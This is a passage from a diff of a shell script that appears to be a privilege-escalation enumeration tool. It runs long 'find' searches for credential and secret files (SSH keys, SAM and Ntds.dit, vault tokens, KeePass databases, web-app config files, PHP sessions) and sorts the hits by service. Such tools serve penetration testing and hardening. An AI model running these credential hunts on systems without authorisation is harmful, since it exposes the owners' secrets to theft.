-name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"agent*\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \"ssh*config\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + + + wait # Always wait at the end + CONT_THREADS=0 #Reset the threads counter + + #GENERATE THE STORAGES OF THE FOUND FILES + PSTORAGE_SYSTEMD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/default/settings.php' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E 'moodle/config.php' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/lib|^/opt|^/.cache|^/sbin|^/srv|^/usr|^/mnt|^/applications|^/systemd" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e 